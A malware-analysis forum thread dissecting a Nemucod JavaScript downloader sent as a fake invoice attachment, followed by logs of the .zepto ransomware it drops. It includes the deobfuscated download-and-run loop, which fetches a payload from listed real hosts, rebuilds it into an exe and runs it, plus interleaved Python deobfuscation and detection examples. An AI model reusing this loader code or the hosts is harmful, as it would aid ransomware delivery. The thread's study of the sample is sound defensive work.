Malware Analysis New fresh sample received by mail - JS/TrojanDownloader.Nemucod.AJP

DardiM

Level 26
Thread author
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
Latest version received by e-mail attachment: July 12, 2016

https://www.virustotal.com/en/file/...83cc067b95e7b23f5cd9a32f895c4acc1f2/analysis/

-SWIFT-dbc-.js
Detection ratio: 25 / 55


"hi DardiM,

Here's that excel file (latest invoices) that you wanted.

Best regards,
Elnora Lowery
Chief Executive Officer"


Threat Verdict: malicious
Threat Score: 100/100
AV Detection Ratio: 36%
AV Family Name: JS:Trojan.JS.Downloader , Trojan-Downloader.JS.Agent.lph, JS/TrojanDownloader.Nemucod.AJP
Time of analysis: 2016-07-14 01:53:48
File Size (bytes): 82904
File Type: ASCII text, with CRLF, LF line terminators
Contacted Domains: zachphoto.7u.cz, error.banan.cz, nicesound.biz, acepipesdeli.com.br
Contacted Hosts: 77.93.211.244, 186.202.153.125


function f(s) {return eval(s);};

var abvxN2A = [';}\n','\xff',
'\r;)','\xff',
'(])','\xff',
'cTH','\xff',
'RM(','\xff',
'8yX','\xff',
'ZG ','\xff',
...
...
...
'\r;"','\xff',
'" +','\xff',
' "e','\xff',
'sol','\xff',
'c" ','\xff',
'= 8','\xff',
'eVK','\xff',
'WB ','\xff',
'rav'];
=> NOT TOO DIFFICULT TO READ FROM THE END (reversed) : var BWKVe8 = "close";...
/*@cc_on
b = abvxN2A;
b = b["join"]("");
b = b["split"]("\xff");
b = b["join"]("");
b = b["split"]("");
c = b["reverse"]();

c = c["join"]("");
@*/

if (c["length"] >= 12) f(c);

In this "all in a var" method, it differs from other versions by using a function to indirectly eval the content of the c var, and by the operations done before calling it:
b = abvxN2A;
b = b["join"]("");
b = b["split"]("\xff");
b = b["join"]("");
b = b["split"]("");
c = b["reverse"]();

c = c["join"]("");

An example of what can be seen after the above operations, without evaluation:
Real strings are cut into several parts
var BWKVe8 = "close";
var NRZu = "le";
var Kk0 = "eToFi";
var KOIv = "Sav";
var HWl = "xt";
var Rm2 = "teTe";
var OEy0 = "wri";
var KVq = "open"
var OISc = "arset";
var Qp = "Ch";
var CYb7 = "type"
var ARRr = "eam";
var Us3 = "B.Str"
var Mb = "ADOD";
var BFp = "ect"
var DYg = "bj";
var Es0 = "eO";
var EIq = "Creat";
var JFRGy = "in";
var Qx9 = "jo";
var OMXj = "e";
var PWq = "rCod";
var Kg = "Cha";
var UPNl7 = "from";
var NGn = "h";
var UUr = "lengt";
function IKu8(FRXf7){return FRXf7;};
function KWCc(FNs){return FNs;};
var OUp9 = "sh";
var Sv9 = "pu";
function Gs1(IQj9){return IQj9;};

...
=> the real var contents are constructed afterwards:
- example : KOIv + Kk0 + KOIv => "SaveFileTo"

It uses Bitwise and Bit Shift Operators :

Bitwise inclusive OR operation and Shift Operators
var NJx3=HMNz[HMNz[MSd0(BVh8) + OTFi1(DPf8)]-4] | HMNz[HMNz[BVh8 + DPf8]-3] << 8 | HMNz[HMNz[BVh8 + DPf8]-2] << 16 | HMNz[HMNz[BVh8 + DPf8]-1] ;


for (var Pg3=0; Pg3 < HMNz[BVh8 + (function DYn5(){return DPf8;}())]; Pg3++) {
HMNz[Pg3]
^= SRCAj8; => bitwise exclusive OR operation (XOR)
SRCAj8=(SRCAj8 + Vt) % 256; }; => modulo
return HMNz; };

Some scripts / methods / objects used:

"WScript.Shell"
"ADOB.Stream"

"WinHttp.WinHttpRequest.5.1"
"MSXML2.XMLHTTP"

=> two connection methods available, to be sure :p

"Sleep"
"CreateObject"
"LoadFromFile"
"saveToFile"
"writeText"
"open"
"write"
...


HTTP request by GET Method :

=> several URLs => to increase its chances of success

zachphoto.7u.cz/0jyhh
nicesound.biz/42did
acepipesdeli.com.br/tffx7


=> Names constructed by concatenation of several "clear" vars

Path of file that is downloaded :

CreateObject(WScript.Shell).ExpandEnvironmentStrings(%TEMP%/)
=> "C:\Users\DardiM\AppData\Local\Temp\
+ concatenation
=> "C:\Users\DardiM\AppData\Local\Temp\uosoT7UCkbfcrM.exe"

This sample is not in a well-formed executable format, to avoid possible detection by protection tools: it is an obfuscated file.

If no sample can be downloaded :
"C:\Users\DardiM\AppData\Local\Temp\uosoT7UCkbfcrM"
=> a XML file (without extension) which is regularly modified (modified time)
=> If you delete it manually, created again :)
=> that's why it's seen as XML file on some dynamical analysis (www.hybrid-analysis.com)
"%TEMP%\uosoT7UCkbfcrM
Size 1008B (1008 bytes)
Type XML document text
Runtime Process wscript.exe (PID: 2468)"

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="XHTML namespace" lang="en" xml:lang="en">
<head>
<title>Object not found!</title>
<link rev="made" href="mailto:root@localhost" />
<style type="text/css"><!--/*--><![CDATA[/*><!--*/
body { color: #000000; background-color: #FFFFFF; }
a:link { color: #0000CC; }
p, address {margin-left: 3em;}
span {font-size: smaller;}
/*]]>*/--></style>
</head>

<body>
<h1>Object not found!!</h1>
<p>


The requested URL was not found on this server.

If you entered the URL manually please check your
spelling and try again.

</p>
<p>
If you think this is a server error, please contact
<a href="mailto:root@localhost">webmestre</a>.

</p>

<h2>Error 404</h2>
<address>
<a href="/">acepipesdeli.com.br</a><br />
<span>Thu Jul 14 20:03:30 2016<br />
Apache</span>
</address>
</body>
</html>

Several Arrays of chars :
=> character substitution cipher (see explanation at the end)
2 arrays for the substitution function found:
=> All characters in the file are converted to their decimal values. If a character’s decimal value is higher than 127, the character is replaced with its corresponding value from a pre-defined array of characters. If not, the character remains untouched
One example :
function NDn2(BCs1) {
var FCi9=new Array(); FCi9[0xC7]=0x80; FCi9[0xFC]=0x81; FCi9[0xE9]=0x82; FCi9[0xE2]=0x83; FCi9[0xE4]=0x84; FCi9[0xE0]=0x85; FCi9[0xE5]=0x86; FCi9[0xE7]=0x87; FCi9[0xEA]=0x88; FCi9[0xEB]=0x89; FCi9[0xE8]=0x8A; FCi9[0xEF]=0x8B; FCi9[0xEE]=0x8C; FCi9[0xEC]=0x8D; FCi9[0xC4]=0x8E; FCi9[0xC5]=0x8F; FCi9[0xC9]=0x90; FCi9[0xE6]=0x91; FCi9[0xC6]=0x92; FCi9[0xF4]=0x93; FCi9[0xF6]=0x94; FCi9[0xF2]=0x95; FCi9[0xFB]=0x96; FCi9[0xF9]=0x97; FCi9[0xFF]=0x98; FCi9[0xD6]=0x99; FCi9[0xDC]=0x9A; FCi9[0xA2]=0x9B; FCi9[0xA3]=0x9C; FCi9[0xA5]=0x9D; FCi9[0x20A7]=0x9E; FCi9[0x192]=0x9F; FCi9[0xE1]=0xA0; FCi9[0xED]=0xA1; FCi9[0xF3]=0xA2; FCi9[0xFA]=0xA3; FCi9[0xF1]=0xA4; FCi9[0xD1]=0xA5; FCi9[0xAA]=0xA6; FCi9[0xBA]=0xA7; FCi9[0xBF]=0xA8; FCi9[0x2310]=0xA9; FCi9[0xAC]=0xAA; FCi9[0xBD]=0xAB; FCi9[0xBC]=0xAC; FCi9[0xA1]=0xAD; FCi9[0xAB]=0xAE; FCi9[0xBB]=0xAF; FCi9[0x2591]=0xB0; FCi9[0x2592]=0xB1; FCi9[0x2593]=0xB2; FCi9[0x2502]=0xB3; FCi9[0x2524]=0xB4; FCi9[0x2561]=0xB5; FCi9[0x2562]=0xB6; FCi9[0x2556]=0xB7; FCi9[0x2555]=0xB8; FCi9[0x2563]=0xB9; FCi9[0x2551]=0xBA; FCi9[0x2557]=0xBB; FCi9[0x255D]=0xBC; FCi9[0x255C]=0xBD; FCi9[0x255B]=0xBE; FCi9[0x2510]=0xBF; FCi9[0x2514]=0xC0; FCi9[0x2534]=0xC1; FCi9[0x252C]=0xC2; FCi9[0x251C]=0xC3; FCi9[0x2500]=0xC4; FCi9[0x253C]=0xC5; FCi9[0x255E]=0xC6; FCi9[0x255F]=0xC7; FCi9[0x255A]=0xC8; FCi9[0x2554]=0xC9; FCi9[0x2569]=0xCA; FCi9[0x2566]=0xCB; FCi9[0x2560]=0xCC; FCi9[0x2550]=0xCD; FCi9[0x256C]=0xCE; FCi9[0x2567]=0xCF; FCi9[0x2568]=0xD0; FCi9[0x2564]=0xD1; FCi9[0x2565]=0xD2; FCi9[0x2559]=0xD3; FCi9[0x2558]=0xD4; FCi9[0x2552]=0xD5; FCi9[0x2553]=0xD6; FCi9[0x256B]=0xD7; FCi9[0x256A]=0xD8; FCi9[0x2518]=0xD9; FCi9[0x250C]=0xDA; FCi9[0x2588]=0xDB; FCi9[0x2584]=0xDC; FCi9[0x258C]=0xDD; FCi9[0x2590]=0xDE; FCi9[0x2580]=0xDF; FCi9[0x3B1]=0xE0; FCi9[0xDF]=0xE1; FCi9[0x393]=0xE2; FCi9[0x3C0]=0xE3; FCi9[0x3A3]=0xE4; FCi9[0x3C3]=0xE5; FCi9[0xB5]=0xE6; FCi9[0x3C4]=0xE7; FCi9[0x3A6]=0xE8; FCi9[0x398]=0xE9; FCi9[0x3A9]=0xEA; FCi9[0x3B4]=0xEB; FCi9[0x221E]=0xEC; 
FCi9[0x3C6]=0xED; FCi9[0x3B5]=0xEE; FCi9[0x2229]=0xEF; FCi9[0x2261]=0xF0; FCi9[0xB1]=0xF1; FCi9[0x2265]=0xF2; FCi9[0x2264]=0xF3; FCi9[0x2320]=0xF4; FCi9[0x2321]=0xF5; FCi9[0xF7]=0xF6; FCi9[0x2248]=0xF7; FCi9[0xB0]=0xF8; FCi9[0x2219]=0xF9; FCi9[0xB7]=0xFA; FCi9[0x221A]=0xFB; FCi9[0x207F]=0xFC; FCi9[0xB2]=0xFD; FCi9[0x25A0]=0xFE; FCi9[0xA0]=0xFF;
};var KUXf=new Array();
for (var Pg3=0; Pg3 < BCs1[BVh8 + DPf8]; Pg3++) {
var LEAc=BCs1[Su + OOGv0 + Gs1(RHJi) + (function Od(){return AHo7;}())](Pg3);
if (LEAc < (614 - 486)) {
var VCRBj=LEAc;}
else {
var VCRBj=FCi9[LEAc];
}
KUXf[IKu8(Sv9) + KWCc(OUp9)](VCRBj); };
return KUXf;

Conclusion :

The JavaScript is interacting with the downloaded sample and doing a few additional layers of dis-obfuscation:

- character substitution cipher

- character removal, XORing, and reversing the file

Then, it validates the magic numbers in the file header: 4D5A ("MZ", Windows PE):

function Xu9(HMNz) {
if (HMNz[1 * 0]== 0x4D && HMNz[1]== 0x5a) {return true;}
else {return false;}
};


The exe is run with a parameter !
=> "321"
=> "C:\Users\DardiM\AppData\Local\Temp\uosoT7UCkbfcrM.exe 321"


Will see if I post more :)
(still a few things to say about how this JS file works, but I don't think it's important currently)
 
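The six array operations in the post above (join, split on "\xff", join, split into characters, reverse, join) can be replayed outside the script engine, so the hidden source is recovered without ever handing it to eval. The following is an added Python example written for this thread; it is not code from the sample or from DardiM. The fragment list is constructed to mirror the tail of the sample's array, the regex only picks up plain `var NAME = "literal"` declarations, and the variable names used in the test are taken from the post while the concatenation itself is my own choice.

```python
"""Static reconstruction of a Nemucod-style "all in a var" string array.

Added example for analysis, not code from the sample or the thread author.
It replays the six array operations the sample performs (join, split on
"\xff", join, split into characters, reverse, join) in Python so the hidden
script can be read without evaluating it, then folds `var X = "..."`
fragments and simple A + B + C concatenations back into whole strings.
"""
import re

# Constructed fragments, in the order the sample's array lists them:
# each 3-character chunk is followed by a "\xff" separator. This mirrors the
# tail of the array shown in the post; it is not the array from the sample.
SAMPLE_FRAGMENTS = [
    '\r;"', '\xff', '" +', '\xff', ' "e', '\xff', 'sol', '\xff',
    'c" ', '\xff', '= 8', '\xff', 'eVK', '\xff', 'WB ', '\xff', 'rav',
]


def unwrap_string_array(fragments):
    """Replay b.join("").split("\xff").join("").split("").reverse().join("")."""
    joined = "".join(fragments)            # b["join"]("")
    parts = joined.split("\xff")           # b["split"]("\xff")
    joined = "".join(parts)                # b["join"]("")
    chars = list(joined)                   # b["split"]("")
    chars.reverse()                        # b["reverse"]()
    return "".join(chars)                  # c["join"]("")


# Only plain double-quoted declarations; escapes and single quotes are
# deliberately not handled so that unusual cases surface as "unresolved".
VAR_DECL = re.compile(r'var\s+(\w+)\s*=\s*"([^"]*)"')


def collect_string_vars(script):
    """Map every `var NAME = "literal"` in the recovered script to its value."""
    return {name: value for name, value in VAR_DECL.findall(script)}


def fold_concatenation(expr, string_vars):
    """Resolve an expression such as `KOIv + Kk0 + NRZu` to one string.

    Each operand must be a known variable or a double-quoted literal
    (literals containing '+' are not supported). Anything else raises, so
    the analyst sees what the static pass could not resolve instead of
    getting a silently wrong name.
    """
    out = []
    for token in (t.strip() for t in expr.split("+")):
        if len(token) >= 2 and token.startswith('"') and token.endswith('"'):
            out.append(token[1:-1])
        elif token in string_vars:
            out.append(string_vars[token])
        else:
            raise KeyError("unresolved operand: %s" % token)
    return "".join(out)


def recover(fragments):
    """Full pass: unwrap the array, then return (script, var table)."""
    script = unwrap_string_array(fragments)
    return script, collect_string_vars(script)


if __name__ == "__main__":
    script, table = recover(SAMPLE_FRAGMENTS)
    print(repr(script))
    print(table)
```

Running the block on the constructed fragments yields `var BWKVe8 = "close" + "";` followed by the carriage return that the sample's first fragment carried, which is the same text the post reads off the end of the array by hand; the variable table and `fold_concatenation` then turn the cut-up literals into the method names the script actually calls.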

DardiM

Level 26
Thread author
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
Good, Nemucod usually drops Ransomware and it's only used as a downloader. If you have the payload, do a quick analysis and post it here :D
There have already been other versions with similar behavior, but with a few differences before and after the "obfuscated" var.
http://malwaretips.com/threads/new-nemucod-wave-began.60829/#post-519129
I never made an analysis for these versions before (the obfuscated part), so today I began this small analysis.

I haven't got the payload yet (the file downloaded is not the real final file, because it needs to be modified by the JS downloader).
=> I did not run the JS file when I did my dis-obfuscation / analysis (safe-mode analyzing).
But it may not be a big challenge to modify the JS file to let it download and modify the file, without running it at the end of the process.

I will try to obtain a working version (must first find a working url).
 

DardiM

Level 26
Thread author
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
First post updated (added the case where the sample can't be downloaded, and some other info)

Working version analysis here :
https://www.hybrid-analysis.com/sam...34de531f979c5722266e3ddf938?environmentId=100

A different file name is seen in some analyses, but the same size (139776 bytes), same domains, same host (the first in the list from my first post)

GET /0jyhh HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: zachphoto.7u.cz
Connection: Keep-Alive

=>
/0jyhh
/tffx7
are both ones I've seen in my sample JS
 

DardiM

Level 26
Thread author
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
I will certainly attach a PDF file to show what it looks like when dis-obfuscated (or deobfuscated :rolleyes:).

A small part now.

The do ... while loop explains why uosoT7UCkbfcrM has its modification time regularly updated (the XML content is the response to the HTTP request if the sample is not found)
=> the process doesn't end, waiting for the good obfuscated sample to be downloaded.
It will only become uosoT7UCkbfcrM.exe as soon as everything goes well, and the malware is then run with the right parameter.

var httpMethod=["WinHttp.WinHttpRequest.(5.1)", "MSXML2.XMLHTTP"];

for (var index=0; index < httpMethod.length; index++)
{
    try {
        var objet_Http=WScript.CreateObject(httpMethod[index]); // "WinHttp.WinHttpRequest.(5.1)", "MSXML2.XMLHTTP"
        break;
    }
    catch (e)
    {
        continue; // next index
    }
};

var WAk8=1;
var Ba=0;
do {
    try {
        if (1== WAk8)
        {
            if (Ba >= URLS_array.length) // array with 3 urls
            {
                Ba=0;
                WScript.Sleep(1000);
            }
            objet_Http.open("GET", URLS_array[Ba++ % URLS_array.length], false);
            objet_Http.send();
        }
        if (objet_Http.readystate < 4)
        {
            WScript.Sleep(1000);
            continue;
        }
        var object_ADODB_Stream=WScript.CreateObject("ADODB.Stream");
        object_ADODB_Stream.open();
        object_ADODB_Stream.type=1; //Binary data
        object_ADODB_Stream.write(objet_Http.ResponseBody);
        object_ADODB_Stream.position=0;
        object_ADODB_Stream.SaveToFile(uosoT7UCkbfcrM_file_path, 2);
        object_ADODB_Stream.close();

        var file_content=ReadTextFromFile_char_substitution_1(uosoT7UCkbfcrM_file_path);
        // "C:\Users\DardiM\AppData\Local\Temp\uosoT7UCkbfcrM"

        file_content=deobfuscation(file_content);
        // Bitwise inclusive OR operation and Shift Operators
        // bitwise exclusive OR operation (XOR) modulo
        // and more :p

        if (file_content.length < 100 * 1024 || file_content.length > 230 * 1024 || !has_MZ(file_content))
        {
            WAk8=1; continue; // not the valid exe file => jump to while (WAk8)
        }
        try {
            WriteTextToFile_char_substitution_2(uosoT7UCkbfcrM_EXE_file_path, file_content); // try to create the valid exe, with Charset windows-437
        }
        catch (e) {
            break;
        };
        object_Shell.Run(uosoT7UCkbfcrM_EXE_file_path + " 321");
        // run the valid exe (ransomware) file with parameter "321"
        // "C:\Users\DardiM\AppData\Local\Temp\uosoT7UCkbfcrM.exe 321"
        break;
    }
    catch (e) {
        WScript.Sleep(1000);
        continue; // => jump to while (WAk8)
    };
} while (WAk8);
 
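The "character substitution cipher" arrays from the first post (the FCi9 table in NDn2) and the "Charset windows-437" note in the loop above are two sides of the same thing: the downloaded bytes are read as text in code page 437, and the table maps each resulting character above 127 back to its original byte. The following is an added Python example, not code from the sample or from DardiM. The handful of table entries in it are copied from the FCi9 function in the first post (the rest of the table is not reproduced), and Python's built-in cp437 codec is used as the reference; the check it performs is the one an analyst wants before replacing the whole array with a single encode() call.

```python
"""Why the sample's "substitution cipher" arrays are a code page.

Added example, not code from the sample or the thread. The sample writes the
downloaded bytes out as text with the windows-437 charset, then maps every
character with a code above 127 through a hard-coded table such as FCi9.
Python's cp437 codec defines the same mapping, so the table can be checked
against the codec and then replaced by it when recovering the raw bytes.
"""

# Entries copied from the FCi9 table in the first post: code point -> byte.
PAGE_TABLE_SUBSET = {
    0xC7: 0x80, 0xFC: 0x81, 0xE9: 0x82, 0xE2: 0x83, 0xE4: 0x84,
    0x20A7: 0x9E, 0x192: 0x9F, 0x2310: 0xA9, 0x2591: 0xB0,
    0x2502: 0xB3, 0x3B1: 0xE0, 0x221E: 0xEC, 0x25A0: 0xFE, 0xA0: 0xFF,
}


def cp437_table():
    """Build the full code-point -> byte map for bytes 0x80..0xFF from the codec."""
    table = {}
    for byte in range(0x80, 0x100):
        ch = bytes([byte]).decode("cp437")
        table[ord(ch)] = byte
    return table


def table_mismatches(subset=PAGE_TABLE_SUBSET):
    """Return (code point, page byte, codec byte) for every disagreeing entry."""
    full = cp437_table()
    return [(cp, b, full.get(cp)) for cp, b in subset.items() if full.get(cp) != b]


def substitute(text):
    """The NDn2 logic: a code below 128 is kept, otherwise the table is used.

    Returns a list of byte values, the same shape the sample builds with push().
    The constant 128 is what the sample spells as (614 - 486).
    """
    full = cp437_table()
    out = []
    for ch in text:
        code = ord(ch)
        out.append(code if code < 128 else full[code])
    return out


def text_to_raw_bytes(text):
    """Same result through the codec: undo the cp437 decode in one call."""
    return text.encode("cp437")


def roundtrip_ok(raw=bytes(range(256))):
    """Constructed round trip: raw bytes -> cp437 text (as the sample reads the
    file) -> back to the raw bytes, both through the table logic and the codec."""
    as_text = raw.decode("cp437")
    return bytes(substitute(as_text)) == raw and text_to_raw_bytes(as_text) == raw


if __name__ == "__main__":
    print("mismatches:", table_mismatches())
    print("round trip ok:", roundtrip_ok())
```

If `table_mismatches()` comes back empty for the entries copied from a sample, the 128-entry array in that sample is just the cp437 decode table and `text_to_raw_bytes` can stand in for it; if it lists entries, the sample changed the mapping and the table has to be carried over as written.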

DardiM

Level 26
Thread author
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
The URLs in my sample don't work anymore.
With small modifications to the deobfuscated JS downloader (I deleted the 'download and run' parts), and with another obfuscated payload (from the same wave) renamed and put in a folder, I successfully made it become a valid exe with good content inside.

I can now make a dynamic analysis of the ransomware payload.

=> clouf.exe 1.5.2.2

.zepto extension at the end of each encrypted file
 

DardiM

Level 26
Thread author
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
Ransomware name when tested : uosoT7UCkbfcrM.exe (real name : clouf)

My log file for analysis is more than 250 MB:


- Interesting Reg Keys and files opened / created (I can't list all :confused:)

C:\Windows\SysWOW64\winmmbase.dll
C:\Windows\SysWOW64\ntdll.dll
C:\Windows\System32\wow64.dll
C:\Windows\System32\wow64win.dll
C:\Windows\System32\wow64log.dll
C:\Windows\SysWOW64\kernel32.dll
C:\Windows\System32\wow64cpu.dll
C:\Windows\SysWOW64\KernelBase.dll
C:\Windows\SysWOW64\gdi32.dll

C:\Windows\SysWOW64\cryptbase.dll
C:\Windows\SysWOW64\bcryptprimitives.dll


C:\Windows\SysWOW64\windows.storage.dll
C:\Windows\SysWOW64\combase.dll
C:\Windows\SysWOW64\shlwapi.dll
C:\Windows\SysWOW64\kernel.appcore.dll

C:\Windows\SysWOW64\winmmbase.dll
C:\Windows\SysWOW64\imm32.dll

C:\Windows\SysWOW64\uxtheme.dll

C:\Windows\SysWOW64\wininet.dll
C:\Windows\SysWOW64\mpr.dll
C:\Windows\SysWOW64\dsrole.dll

C:\Windows\SysWOW64\urlmon.dll
C:\Windows\SysWOW64\iertutil.dll

C:\Windows\SysWOW64\cryptsp.dll

HKLM\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Defaults\Provider\Microsoft Enhanced RSA and AES Cryptographic Provider


C:\Windows\SysWOW64\rsaenh.dll
C:\Windows\SysWOW64\bcrypt.dll


HKLM\SOFTWARE\Policies\Microsoft\Cryptography\PrivKeyCacheMaxItems
HKLM\SOFTWARE\Policies\Microsoft\Cryptography\PrivKeyCachePurgeIntervalSeconds
HKLM\SOFTWARE\Policies\Microsoft\Cryptography\PrivateKeyLifetimeSeconds

HKLM\SOFTWARE\Microsoft\Cryptography\MachineGuid

HKLM\System\CurrentControlSet\Control\Cryptography\Providers
HKLM\System\CurrentControlSet\Control\Cryptography\Configuration

C:\Windows\SysWOW64\ntmarta.dll

HKLM\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Defaults\Provider Types\Type 024\Name
HKLM\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Defaults\Provider\Microsoft Enhanced RSA and AES Cryptographic Provider\Image Path

HKLM\Software\WOW6432Node\Microsoft\Cryptography\DESHashSessionKeyBackward

HKLM\Software\WOW6432Node\Microsoft\Rpc
HKLM\System\CurrentControlSet\Control\ComputerName\ActiveComputerName\ComputerName

HKLM\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE
HKLM\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION

HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\
uosoT7UCkbfcrM.exe
=> NOT FOUND

HKLM\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\uosoT7UCkbfcrM.exe
=> NOT FOUND

HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent
HKLM\Software\WOW6432Node\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Post Platform

C:\Windows\SysWOW64\phoneinfo.dll
=> NOT FOUND

HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\SyncMode5

HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions

HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1

HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Cache
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData


C:\Users\DardiM\AppData\Local\Microsoft\Windows\INetCache
C:\Users\DardiM\AppData\Local\Microsoft\Windows\INetCache\counters.dat
C:\Windows\SysWOW64\KernelBase.dll

HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\SecureProtocols
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\CertificateRevocation
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp1_1
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate


HKLM\System\CurrentControlSet\Services\WinSock2\Parameters
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9

C:\Windows\SysWOW64\OnDemandConnRouteHelper.dll
C:\Windows\SysWOW64\IPHLPAPI.DLL
C:\Windows\SysWOW64\winhttp.dll

HKLM\System\CurrentControlSet\Control\SESSION MANAGER

C:\Windows\SysWOW64\mswsock.dll

HKLM\System\CurrentControlSet\Services\Winsock\Setup Migration\Providers\Psched\WinSock 2.0 Provider ID
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Winsock\Mapping

HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders


C:\Users\DardiM\AppData\Local\Microsoft\Windows\History\History.IE5
C:\Windows\SysWOW64\dnsapi.dll
C:\Windows\SysWOW64\mswsock.dll
C:\Windows\SysWOW64\fr-FR\mswsock.dll.mui
C:\Windows\SysWOW64\mswsock.dll
C:\Windows\SysWOW64\fr-FR\wshqos.dll.mui
C:\Windows\SysWOW64\wshqos.dll

URLs
v43762.hosted-by-vdsina.ru
388.BE.1.multiservers.xyz
5.196.189.37

77.222.54.202 (City Pargolovo - State/Region Sankt-Peterburg - Country Code RU)
=> TCP Connect
=> TCP Send
=> TCP TCPCopy
=> TCP Receive


Other files:
C:\Windows\SysWOW64\fr-FR\mpr.dll.mui
C:\Windows\SysWOW64\drprov.dll
C:\Windows\SysWOW64\winsta.dll
C:\Windows\SysWOW64\ntlanman.dll
C:\Windows\SysWOW64\davclnt.dll
C:\Windows\SysWOW64\davhlpr.dll
C:\Windows\SysWOW64\wkscli.dll
C:\Windows\SysWOW64\cscapi.dll
C:\Windows\SysWOW64\netutils.dll
C:\Windows\SysWOW64\browcli.dll

HKLM\System\CurrentControlSet\Control\SQMServiceList\SQMServiceList

C:\Windows\CSC\v2.0.6\namespace
C:\Windows\SysWOW64\srvcli.dll
C:\Windows\CSC\v2.0.6\namespace\DARDIM-PC

Then it retries all drive letters

HKLM\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Defaults\Provider\Microsoft Enhanced RSA and AES Cryptographic Provider
HKLM\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Defaults\Provider\Microsoft Enhanced RSA and AES Cryptographic Provider\Image Path

=> loop to encrypt initialized !

C:\120 Wallpapers HD

HKLM\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISABLE_UNICODE_HANDLE_CLOSING_CALLBACK

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe


AT THE END :

Some IRP_MJ_CLEANUP & IRP_MJ_CLOSE

C:\Windows\AppPatch\apppatch64\sysmain.sdb
C:\Windows\SysWOW64\cmd.exe
C:\Windows\Fonts\StaticCache.dat
C:\Users\DardiM\AppData\Local\Temp
C:\Users\DardiM\AppData\Local\Microsoft\Windows\INetCache\counters.dat
C:\Windows\SysWOW64\fr-FR\mpr.dll.mui
C:\Windows\SysWOW64\fr-FR\mswsock.dll.mui
C:\Windows\SysWOW64\fr-FR\propsys.dll.mui

TCP Disconnect 77.222.54.202 (City Pargolovo - State/Region Sankt-Peterburg - Country Code RU)

Files created
C:\Users\DardiM\Desktop\_HELP_instructions.html
C:\Windows\Fonts\StaticCache.dat
C:\Users\DardiM\Desktop\_HELP_instructions.bmp

Files Read
C:\Windows\SysWOW64\propsys.dll
C:\Windows\SysWOW64\clbcatq.dll
C:\Windows\Registration\R000000000015.clb
C:\Users\DardiM\Desktop\desktop.ini
C:\desktop.ini
C:\Users\desktop.ini
C:\Windows\SysWOW64\windows.storage.dll
C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.494_none_ea85e725b9ba5a4b\comctl32.dll
C:\Windows\WindowsShell.Manifest
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

%temp%\uosoT7UCkbfcrM.exe closed

=> An HTML file is located in each Folder where files have been encrypted
Example :
_2_HELP_instructions.html
C:\120 Wallpapers HD\5FC4B320-69D3-B282-97E0-DE77CFB27811.zepto

At the end, an HTML file is opened with information about what happened, and instructions to pay the ransom
There is only one _HELP_instructions.bmp file for all _instructions.html created

[screenshot: screen.jpg]


Note :
I will not write more about this ransomware family (all the samples I've seen work the same way) :)
Will wait for next wave, if something new :rolleyes:
 
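The behaviour logged in the post above suggests two detection points a defender can check for in endpoint telemetry: wscript.exe writing a file under %TEMP% and then launching the same name with ".exe" appended and the argument "321" (the downloader stage), and a folder receiving both a ".zepto" file and a _HELP_instructions.html (the payload stage). The following is an added Python example, not code from the thread; the event records are constructed to resemble what a sensor would log, and the field names (`type`, `process`, `path`, `args`) are my own assumption rather than any product's schema. Paths and names in the records are the ones reported in the thread.

```python
"""Triage of endpoint events for the two stages described in this thread.

Added example, not code from the thread. The records are constructed and the
field names are assumptions, not a real sensor's schema.
"""
import re
from collections import defaultdict

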